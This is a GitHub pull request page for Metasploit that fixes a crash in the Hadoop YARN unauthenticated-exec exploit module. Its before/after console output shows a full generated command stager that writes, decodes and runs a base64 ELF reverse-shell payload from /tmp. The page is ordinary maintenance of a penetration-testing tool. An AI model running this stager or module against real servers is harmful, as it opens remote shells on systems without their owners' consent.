Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix #12156, NoMethodError in hadoop exploit. #12175

Merged
merged 1 commit into from
Aug 8, 2019
Merged

Fix #12156, NoMethodError in hadoop exploit. #12175

merged 1 commit into from
Aug 8, 2019

Conversation

Green-m
Copy link
Contributor

@Green-m Green-m commented Aug 8, 2019

Thanks to @wvu-r7 for this patch!
Fix #12156

Before

msf5 exploit(linux/http/hadoop_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.8.100:4444
[*] Sending Command
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgIZGgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/nuCXw.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/NJTbh' < '/tmp/nuCXw.b64' ; chmod +x '/tmp/NJTbh' ; '/tmp/NJTbh' ; rm -f '/tmp/NJTbh' ; rm -f '/tmp/nuCXw.b64'"]
[-] The connection timed out (12.4.3.2:8088).
[-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
[*] Exploit completed, but no session was created.

After patch

msf5 exploit(linux/http/hadoop_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.8.100:4444
[*] Sending Command
[-] Exploit aborted due to failure: not-found: Could not retrieve application-id
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hadoop_unauth_exec) >

@Green-m Green-m requested a review from wvu August 8, 2019 02:11
wvu
wvu approved these changes Aug 8, 2019
View reviewed changes
Copy link
Contributor

@wvu wvu left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you, @Green-m!

@wvu wvu self-assigned this Aug 8, 2019
@wvu wvu merged commit 6cf0ff0 into rapid7:master Aug 8, 2019
wvu added a commit that referenced this pull request Aug 8, 2019
@wvu
Land #12175, hadoop_unauth_exec NoMethodError fix
f317987
@wvu
Copy link
Contributor

wvu commented Aug 8, 2019
edited by tdoan-r7
Loading

Release Notes

The NoMethodError crash in the exploit/linux/http/hadoop_unauth_exec module has been resolved.

msjenkins-r7 pushed a commit that referenced this pull request Aug 8, 2019
@wvu @msjenkins-r7
Land #12175, hadoop_unauth_exec NoMethodError fix
2cc2545
@wvu
Copy link
Contributor

wvu commented Aug 8, 2019

A tiny whitespace fix in b5fd9b4.

I appreciate you, @Green-m! (Stealing @ccondon-r7's catchphrase there. ;)

@Green-m Green-m deleted the issue/hadoop_nomethod branch August 8, 2019 05:35
@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Aug 20, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu approved these changes

Assignees

@wvu wvu

Labels
bug module rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

NoMethodError?
3 participants
@Green-m @wvu @tdoan-r7